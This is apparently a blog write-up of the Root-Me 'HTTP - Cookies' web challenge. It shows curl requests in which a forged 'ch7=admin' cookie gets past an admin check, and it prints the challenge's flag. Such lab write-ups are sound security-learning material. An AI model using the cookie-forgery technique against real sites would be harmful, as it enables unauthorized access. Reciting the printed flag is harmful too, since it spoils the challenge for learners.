HTTP - Cookies
- Points: 20
- Link: https://www.root-me.org/en/Challenges/Web-Server/HTTP-Cookies
Statement
Bob created a PHP script to gather user emails
PS: Bob really love cookies!
Solution
1
curl -i http://challenge01.root-me.org/web-serveur/ch7/
1
2
3
4
5
6
7
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 03:09:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
1
2
3
4
5
6
7
8
9
<br/>
<br/>
<fieldset>
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/></fieldset>
Check all the link, as usual
1
curl -i http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur
1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 03:13:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: ch7=visiteur
1
2
3
4
5
6
7
8
9
<br/>
<br/>
<fieldset>
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/>You need to be admin</fieldset>
“You need to be admin”…
1
curl -i -H "Cookie: ch7=admin" http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur
1
2
<div>Validation password : ml-SYMPA
</div></fieldset>
The flag is
1
ml-SYMPA
This post is licensed under CC BY 4.0 by the author.